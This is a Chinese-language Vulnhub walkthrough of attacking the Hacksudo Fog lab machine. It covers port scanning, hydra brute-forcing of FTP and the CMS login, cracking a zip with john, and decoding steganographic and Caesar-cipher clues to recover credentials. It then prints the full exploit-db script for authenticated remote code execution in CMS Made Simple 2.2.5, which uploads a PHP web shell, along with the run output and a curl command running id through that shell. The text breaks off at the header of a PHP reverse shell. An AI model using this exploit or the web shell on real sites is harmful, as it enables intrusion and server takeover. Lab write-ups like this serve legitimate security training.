Vulnhub之Hacksudo Fog靶机详细测试步骤(不同的渗透测试方法)
Hacksudo Fog
作者:jason_huawen
靶机基本信息
名称:hacksudo: FOG
地址:
https://www.vulnhub.com/entry/hacksudo-fog,697/
识别目标主机IP地址
(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:0d:63:f0 1 60 PCS Systemtechnik GmbH
192.168.56.157 08:00:27:b4:32:a9 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.157
NMAP扫描
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.157 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-05 03:36 EST
Nmap scan report for bogon (192.168.56.157)
Host is up (0.00015s latency).
Not shown: 65524 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp Pure-FTPd
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 62:ce:1b:7d:4e:24:0f:8a:c1:c9:ea:c4:1e:21:a7:f3 (RSA)
| 256 92:04:5a:0a:86:62:b3:ba:00:f3:82:6a:c9:8d:ae:6d (ECDSA)
|_ 256 74:c5:7c:9f:8d:06:ee:0c:54:5e:65:b2:30:42:98:49 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Hacksudo FOG
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 35656/udp mountd
| 100005 1,2,3 35859/tcp mountd
| 100005 1,2,3 52010/udp6 mountd
| 100005 1,2,3 53977/tcp6 mountd
| 100021 1,3,4 34868/udp6 nlockmgr
| 100021 1,3,4 39405/tcp6 nlockmgr
| 100021 1,3,4 45117/tcp nlockmgr
| 100021 1,3,4 51204/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
443/tcp open http Apache httpd 2.4.38
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Hacksudo FOG
2049/tcp open nfs_acl 3 (RPC #100227)
3306/tcp open mysql MySQL 5.5.5-10.3.27-MariaDB-0+deb10u1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
| Thread ID: 91
| Capabilities flags: 63486
| Some Capabilities: Support41Auth, Speaks41ProtocolOld, IgnoreSpaceBeforeParenthesis, IgnoreSigpipes, DontAllowDatabaseTableColumn, SupportsLoadDataLocal, InteractiveClient, ODBCClient, SupportsTransactions, FoundRows, Speaks41ProtocolNew, LongColumnFlag, ConnectWithDatabase, SupportsCompression, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
| Status: Autocommit
| Salt: Y=c\#97E4ur\Uth.JiTI
|_ Auth Plugin Name: mysql_native_password
35859/tcp open mountd 1-3 (RPC #100005)
43659/tcp open mountd 1-3 (RPC #100005)
45117/tcp open nlockmgr 1-4 (RPC #100021)
45775/tcp open mountd 1-3 (RPC #100005)
MAC Address: 08:00:27:B4:32:A9 (Oracle VirtualBox virtual NIC)
Service Info: Host: hacksudo.hacksudo; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.39 seconds
获得Shell
NFS
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ showmount -e 192.168.56.157
Export list for 192.168.56.157:
没有任何输出。
FTP
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ ftp 192.168.56.157
Connected to 192.168.56.157.
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 1 of 50 allowed.
220-Local time is now 03:52. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
Name (192.168.56.157:kali): kali
331 User kali OK. Password required
Password:
530 Login authentication failed
ftp: Login failed
ftp> quit
221-Goodbye. You uploaded 0 and downloaded 0 kbytes.
221 Logout.
80端口
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ curl http://192.168.56.157/index1.html
<html>
<title>hacksudo-fogTEAM
</title>
<body style="background-color:black;">
<center><h1><font color=white>Hacksudo:FOG-TEAM</font></h1></center>
<img src="fog.jpg" alt="Fog Project" width="1300" height="600"> </body>
<!-- caesar-cipher ==? https://github.com/hacksudo/SoundStegno --!>
<!-- box author : hacksudo --!>
</html>
难道需要对mp4文件的声音进行分析?
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ ls
nmap_full_scan smoke.mp4
将Mp4文件存储在Kali Linux本地
──(kali㉿kali)-[~/Desktop/Toolsets/SoundStegno-main]
└─$ python ExWave.py -f ~/Desktop/Vulnhub/Hacksudo_Fog/smoke.mp4
_ _ _ _ _ __ __
| || (_)__| |__| |___ _ _ \ \ / /_ ___ _____
| __ | / _` / _` / -_) ' \ \ \/\/ / _` \ V / -_)
|_||_|_\__,_\__,_\___|_||_|_\_/\_/\__,_|\_/\___|
|___|v1.0 www.techchip.net
Visit for more tutorials : www.youtube.com/techchipnet
Hide your text message in wave audio file like MR.ROBOT
Please wait...
Something went wrong!! try again
没有执行成功,暂时搁置对声音的分析。
┌──(kali㉿kali)-[~/Desktop/Toolsets/SoundStegno-main]
└─$ nikto -h http://192.168.56.157
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.157
+ Target Hostname: 192.168.56.157
+ Target Port: 80
+ Start Time: 2023-01-05 04:06:44 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 355, size: 5c2081d0bc3f3, mtime: gzip
+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS
+ OSVDB-3233: /icons/README: Apache default file found.
+ Cookie CMSSESSIDb272ee47bbbb created without the httponly flag
+ OSVDB-3092: /cms/: This might be interesting...
+ 7915 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time: 2023-01-05 04:07:03 (GMT-5) (19 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
nikto工具发现了/cms目录,访问该目录得知该CMS为:
This site is powered by CMS Made Simple version 2.2.5
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ searchsploit CMS Made Simple 2.2.5
------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------- ---------------------------------
CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution | php/webapps/44976.py
CMS Made Simple < 2.2.10 - SQL Injection | php/webapps/46635.py
------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
第一个漏洞需要用户名密码认证,暂时搁置,扫描一下目录和文件。
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ gobuster dir -u http://192.168.56.157 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.157
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Timeout: 10s
===============================================================
2023/01/05 20:48:06 Starting gobuster in directory enumeration mode
===============================================================
/cms (Status: 301) [Size: 314] [--> http://192.168.56.157/cms/]
/fog (Status: 301) [Size: 314] [--> http://192.168.56.157/fog/]
/server-status (Status: 403) [Size: 279]
Progress: 219854 / 220561 (99.68%)
===============================================================
2023/01/05 20:50:31 Finished
===============================================================
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ gobuster dir -u http://192.168.56.157/cms -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.157/cms
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Timeout: 10s
===============================================================
2023/01/05 20:50:40 Starting gobuster in directory enumeration mode
===============================================================
/modules (Status: 301) [Size: 322] [--> http://192.168.56.157/cms/modules/]
/uploads (Status: 301) [Size: 322] [--> http://192.168.56.157/cms/uploads/]
/doc (Status: 301) [Size: 318] [--> http://192.168.56.157/cms/doc/]
/admin (Status: 301) [Size: 320] [--> http://192.168.56.157/cms/admin/]
/assets (Status: 301) [Size: 321] [--> http://192.168.56.157/cms/assets/]
/lib (Status: 301) [Size: 318] [--> http://192.168.56.157/cms/lib/]
/tmp (Status: 301) [Size: 318] [--> http://192.168.56.157/cms/tmp/]
Progress: 219787 / 220561 (99.65%)
===============================================================
2023/01/05 20:53:22 Finished
===============================================================
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ gobuster dir -u http://192.168.56.157 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt,.js
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.157
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Extensions: sh,txt,js,php,html
[+] Timeout: 10s
===============================================================
2023/01/05 20:53:41 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 853]
/index.php (Status: 302) [Size: 0] [--> /fog/index.php]
/index1.html (Status: 200) [Size: 329]
/cms (Status: 301) [Size: 314] [--> http://192.168.56.157/cms/]
/dict.txt (Status: 200) [Size: 1798]
/fog (Status: 301) [Size: 314] [--> http://192.168.56.157/fog/]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1323269 / 1323366 (99.99%)
===============================================================
2023/01/05 21:06:31 Finished
===============================================================
┌──(kali㉿kali)-[~]
└─$ cd ~/Desktop/Vulnhub/Hacksudo_Fog
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ wget http://192.168.56.157/dict.txt
--2023-01-05 20:56:15-- http://192.168.56.157/dict.txt
Connecting to 192.168.56.157:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1798 (1.8K) [text/plain]
Saving to: ‘dict.txt’
dict.txt 100%[=====================================================>] 1.76K --.-KB/s in 0s
2023-01-05 20:56:15 (137 MB/s) - ‘dict.txt’ saved [1798/1798]
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ ls
dict.txt nmap_full_scan smoke.mp4
dict.txt应该是一个密码字典,那用户名是什么呢?
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ hydra -l admin -P dict.txt 192.168.56.157 http-post-form "/cms/admin/login.php:username=^USER^&password=^PASS^&loginsubmit=Submit:incorrect"
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-05 21:04:55
[DATA] max 16 tasks per 1 server, overall 16 tasks, 196 login tries (l:1/p:196), ~13 tries per task
[DATA] attacking http-post-form://192.168.56.157:80/cms/admin/login.php:username=^USER^&password=^PASS^&loginsubmit=Submit:incorrect
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-05 21:04:59
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ hydra -l hacksudo -P dict.txt 192.168.56.157 http-post-form "/cms/admin/login.php:username=^USER^&password=^PASS^&loginsubmit=Submit:incorrect"
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-05 21:05:19
[DATA] max 16 tasks per 1 server, overall 16 tasks, 196 login tries (l:1/p:196), ~13 tries per task
[DATA] attacking http-post-form://192.168.56.157:80/cms/admin/login.php:username=^USER^&password=^PASS^&loginsubmit=Submit:incorrect
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-05 21:05:23
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ hydra -L dict.txt -P dict.txt 192.168.56.157 http-post-form "/cms/admin/login.php:username=^USER^&password=^PASS^&loginsubmit=Submit:incorrect"
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-05 21:05:42
[DATA] max 16 tasks per 1 server, overall 16 tasks, 38416 login tries (l:196/p:196), ~2401 tries per task
[DATA] attacking http-post-form://192.168.56.157:80/cms/admin/login.php:username=^USER^&password=^PASS^&loginsubmit=Submit:incorrect
[STATUS] 3412.00 tries/min, 3412 tries in 00:01h, 35004 to do in 00:11h, 16 active
[STATUS] 3340.67 tries/min, 10022 tries in 00:03h, 28394 to do in 00:09h, 16 active
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
看来dict.txt不是用于http登录的字典,那试一下ftp?
──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ hydra -l hacksudo -P dict.txt ftp://192.168.56.157
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-05 21:12:28
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 196 login tries (l:1/p:196), ~13 tries per task
[DATA] attacking ftp://192.168.56.157:21/
[21][ftp] host: 192.168.56.157 login: hacksudo password: hackme
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-05 21:12:44
哈哈,还真是Ftp的密码,因为http首页有注释,box author是hacksudo因此在这里假设用户名是hacksuo
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ ftp 192.168.56.157
Connected to 192.168.56.157.
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 1 of 50 allowed.
220-Local time is now 21:14. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
Name (192.168.56.157:kali): hacksudo
331 User hacksudo OK. Password required
Password:
230 OK. Current directory is /
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Extended Passive mode OK (|||29066|)
150 Accepted data connection
drwxr-xr-x 3 1002 ftpgroup 4096 May 7 2021 .
drwxr-xr-x 3 1002 ftpgroup 4096 May 7 2021 ..
-rw-r--r-- 1 33 33 389 May 7 2021 flag1.txt
drwxr-xr-x 2 0 0 4096 May 6 2021 hacksudo_ISRO_bak
226-Options: -a -l
226 4 matches total
ftp> get flag1.txt
local: flag1.txt remote: flag1.txt
229 Extended Passive mode OK (|||50546|)
150 Accepted data connection
100% |*********************************************************************************| 389 10.00 KiB/s 00:00 ETA
226-File successfully transferred
226 0.038 seconds (measured here), 10.05 Kbytes per second
389 bytes received in 00:00 (9.45 KiB/s)
ftp> cd hacksudo_ISRO_bak
250 OK. Current directory is /hacksudo_ISRO_bak
ftp> ls -alh
229 Extended Passive mode OK (|||3496|)
150 Accepted data connection
drwxr-xr-x 2 0 0 4096 May 6 2021 .
drwxr-xr-x 3 1002 ftpgroup 4096 May 7 2021 ..
-rw-r--r-- 1 0 0 63 May 5 2021 authors.txt
-rw-r--r-- 1 0 0 0 May 6 2021 installfog
-rw-r--r-- 1 0 0 1573833 May 6 2021 secr3tSteg.zip
226-Options: -a -l
226 5 matches total
ftp> get authors.txt
local: authors.txt remote: authors.txt
229 Extended Passive mode OK (|||37285|)
150 Accepted data connection
100% |*********************************************************************************| 63 1.66 KiB/s 00:00 ETA
226-File successfully transferred
226 0.037 seconds (measured here), 1.66 Kbytes per second
63 bytes received in 00:00 (1.66 KiB/s)
ftp> get secr3tSteg.zip
local: secr3tSteg.zip remote: secr3tSteg.zip
229 Extended Passive mode OK (|||1388|)
150-Accepted data connection
150 1536.9 kbytes to download
100% |*********************************************************************************| 1536 KiB 12.68 MiB/s 00:00 ETA
226-File successfully transferred
226 0.116 seconds (measured here), 12.95 Mbytes per second
1573833 bytes received in 00:00 (12.63 MiB/s)
ftp> quit
221-Goodbye. You uploaded 0 and downloaded 1538 kbytes.
221 Logout.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ ls
authors.txt dict.txt flag1.txt nmap_full_scan secr3tSteg.zip smoke.mp4
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ cat flag1.txt
great you done step 1
___ ___ _ __ __ _ _ __ __ _| |_ _ _| | __ _| |_(_) ___ _ __
/ __/ _ \| '_ \ / _` | '__/ _` | __| | | | |/ _` | __| |/ _ \| '_ \
| (_| (_) | | | | (_| | | | (_| | |_| |_| | | (_| | |_| | (_) | | | |
\___\___/|_| |_|\__, |_| \__,_|\__|\__,_|_|\__,_|\__|_|\___/|_| |_|
|___/
www.hacksudo.com
这次得到第1个flag,从FTP上下载到Kali Linux指的分析一下。
接下来用john the Ripper工具破解一下加密的zip文档,先用之前得到的dict.txt作为字典试一下:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ john --wordlist=dict.txt secr_hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:00 DONE (2023-01-05 21:16) 0g/s 1960p/s 1960c/s 1960C/s hacker
Session completed.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ john --show secr_hash
0 password hashes cracked, 1 left
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt secr_hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
fooled (secr3tSteg.zip)
1g 0:00:00:00 DONE (2023-01-05 21:17) 3.448g/s 946317p/s 946317c/s 946317C/s jedidah..dukefan
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
看来这次需要用rockyou.txt作为密码字典进行破解,成功得到密码,将zip文档解密。
解密后得到一个WAV文件以及txt文档,txt文档好像没啥用,WAV会不会用到最开始尝试的工具Soundstegno工具进行分析。
─(kali㉿kali)-[~/Desktop/Toolsets/SoundStegno-main]
└─$ python ExWave.py -f ~/Desktop/Vulnhub/Hacksudo_Fog/hacksudoSTEGNO.wav
_ _ _ _ _ __ __
| || (_)__| |__| |___ _ _ \ \ / /_ ___ _____
| __ | / _` / _` / -_) ' \ \ \/\/ / _` \ V / -_)
|_||_|_\__,_\__,_\___|_||_|_\_/\_/\__,_|\_/\___|
|___|v1.0 www.techchip.net
Visit for more tutorials : www.youtube.com/techchipnet
Hide your text message in wave audio file like MR.ROBOT
Please wait...
Your Secret Message is: Shift by 3
ABCDEFGHIJKLMNOPQRSTUVWXYZ
DEFGHIJKLMNOPQRSTUVWXYZABC
zzzz.orfdokrvw/irj Xvhuqdph=irj:sdvvzrug=kdfnvxgrLVUR
加密算法是这里支持移动3位,这应该指的是凯撒加密,用在线网站
https://www.qqxiuzi.cn/bianma/kaisamima.php
解密得到:
XYZABCDEFGHIJKLMNOPQRSTUVW
ABCDEFGHIJKLMNOPQRSTUVWXYZ
wwww.localhost/fog Username=fog:password=hacksudoISRO
这里得到的用户名和密码应该是/cms/admin的登录信息,手动验证属实。
此时就可以前面查询得到的漏洞利用脚本进行漏洞利用。
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ searchsploit CMS Made Simple 2.2.5
-------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------- ---------------------------------
CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution | php/webapps/44976.py
CMS Made Simple < 2.2.10 - SQL Injection | php/webapps/46635.py
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ searchsploit -m php/webapps/44976.py
Exploit: CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution
URL: https://www.exploit-db.com/exploits/44976
Path: /usr/share/exploitdb/exploits/php/webapps/44976.py
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/Vulnhub/Hacksudo_Fog/44976.py
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ ls
44976.py dict.txt hacksudoSTEGNO.wav secr3tSteg.zip secr_hash
authors.txt flag1.txt nmap_full_scan secr3t.txt smoke.mp4
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ mv 44976.py exploit.py
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ ls
authors.txt exploit.py hacksudoSTEGNO.wav secr3tSteg.zip secr_hash
dict.txt flag1.txt nmap_full_scan secr3t.txt smoke.mp4
需要修改exploit.py,包括目标主机的IP地址
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ cat exploit.py
# Exploit Title: CMS Made Simple 2.2.5 authenticated Remote Code Execution
# Date: 3rd of July, 2018
# Exploit Author: Mustafa Hasan (@strukt93)
# Vendor Homepage: http://www.cmsmadesimple.org/
# Software Link: http://www.cmsmadesimple.org/downloads/cmsms/
# Version: 2.2.5
# CVE: CVE-2018-1000094
import requests
import base64
base_url = "http://192.168.56.157/cms/admin"
upload_dir = "/uploads"
upload_url = base_url.split('/admin')[0] + upload_dir
username = "fog"
password = "hacksudoISRO"
csrf_param = "_sk_"
txt_filename = 'cmsmsrce.txt'
php_filename = 'shell.php'
payload = "<?php system($_GET['cmd']);?>"
def parse_csrf_token(location):
print location
return location.split(csrf_param+"=")[1]
def authenticate():
page = "/login.php"
url = base_url + page
data = {
"username": username,
"password": password,
"loginsubmit": "Submit"
}
response = requests.post(url, data=data, allow_redirects=False)
status_code = response.status_code
if status_code == 302:
print "[+] Authenticated successfully with the supplied credentials"
#print response.cookies
print '*'*20
cookies = requests.utils.dict_from_cookiejar(response.cookies)
print cookies
print response.headers['Location']
return cookies, parse_csrf_token(response.headers['Location'])
print "[-] Authentication failed"
return None, None
def upload_txt(cookies, csrf_token):
mact = "FileManager,m1_,upload,0"
page = "/moduleinterface.php"
url = base_url + page
data = {
"mact": mact,
csrf_param: csrf_token,
"disable_buffer": 1
}
txt = {
'm1_files[]': (txt_filename, payload)
}
print "[*] Attempting to upload {}...".format(txt_filename)
response = requests.post(url, data=data, files=txt, cookies=cookies)
#print response.text
status_code = response.status_code
if status_code == 200:
print "[+] Successfully uploaded {}".format(txt_filename)
return True
print "[-] An error occurred while uploading {}".format(txt_filename)
return None
def copy_to_php(cookies, csrf_token):
mact = "FileManager,m1_,fileaction,0"
page = "/moduleinterface.php"
url = base_url + page
b64 = base64.b64encode(txt_filename)
serialized = 'a:1:{{i:0;s:{}:"{}";}}'.format(len(b64), b64)
data = {
"mact": mact,
csrf_param: csrf_token,
"m1_fileactioncopy": "",
"m1_path": upload_dir,
"m1_selall": serialized,
"m1_destdir": "/",
"m1_destname": php_filename,
"m1_submit": "Copy"
}
print "[*] Attempting to copy {} to {}...".format(txt_filename, php_filename)
response = requests.post(url, data=data, cookies=cookies, allow_redirects=False)
print 'check response'
status_code = response.status_code
print response.text
if status_code == 302:
if response.headers['Location'].endswith('copysuccess'):
print "[+] File copied successfully"
return True
print "[-] An error occurred while copying, maybe {} already exists".format(php_filename)
return None
def quit():
print "[-] Exploit failed"
exit()
def run():
cookies,csrf_token = authenticate()
print 'cookies='
print cookies
print 'csrf='
print csrf_token
if not cookies:
quit()
if not upload_txt(cookies, csrf_token):
quit()
if not copy_to_php(cookies, csrf_token):
quit()
print "[+] Exploit succeeded, shell can be found at: {}".format(upload_url + '/' + php_filename)
run()
漏洞利用脚本中需要修改的地方主要有:
ip地址
baseurl
csrf_params
这些可以通过浏览器开发者工具中得到。
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ python2 exploit.py
[+] Authenticated successfully with the supplied credentials
********************
{'_sk_': '9929b45a18f71fa7e13', 'CMSSESSIDb272ee47bbbb': 'gjchtrm81f5l9ea66896su247q', '45ba4203b38f2ebed8db32a30c699e4e': '746ff3c7cd79fffb98549c3d3b674e35993020d4%3A%3AYTo1OntzOjM6InVpZCI7aToyO3M6ODoidXNlcm5hbWUiO3M6MzoiZm9nIjtzOjc6ImVmZl91aWQiO047czoxMjoiZWZmX3VzZXJuYW1lIjtOO3M6NToiY2tzdW0iO3M6NDA6IjI0ZTNlMmEzODg4MDU1NGFjMjg4NGIyYjRmOWNjMzc0ODI0OWVjZTAiO30%3D'}
http://192.168.56.157/cms/admin?_sk_=9929b45a18f71fa7e13
http://192.168.56.157/cms/admin?_sk_=9929b45a18f71fa7e13
cookies=
{'_sk_': '9929b45a18f71fa7e13', 'CMSSESSIDb272ee47bbbb': 'gjchtrm81f5l9ea66896su247q', '45ba4203b38f2ebed8db32a30c699e4e': '746ff3c7cd79fffb98549c3d3b674e35993020d4%3A%3AYTo1OntzOjM6InVpZCI7aToyO3M6ODoidXNlcm5hbWUiO3M6MzoiZm9nIjtzOjc6ImVmZl91aWQiO047czoxMjoiZWZmX3VzZXJuYW1lIjtOO3M6NToiY2tzdW0iO3M6NDA6IjI0ZTNlMmEzODg4MDU1NGFjMjg4NGIyYjRmOWNjMzc0ODI0OWVjZTAiO30%3D'}
csrf=
9929b45a18f71fa7e13
[*] Attempting to upload cmsmsrce.txt...
[+] Successfully uploaded cmsmsrce.txt
[*] Attempting to copy cmsmsrce.txt to shell.php...
check response
[+] File copied successfully
[+] Exploit succeeded, shell can be found at: http://192.168.56.157/cms/uploads/shell.php
可以成功上传,验证一下shell的功能?
──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ curl http://192.168.56.157/cms/uploads/shell.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
虽然可以执行各种命令,但是无法通过nc,python等生成反弹shell
改变方法:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ cat shell.php
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. The author accepts no liability
// for damage caused by this tool. If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
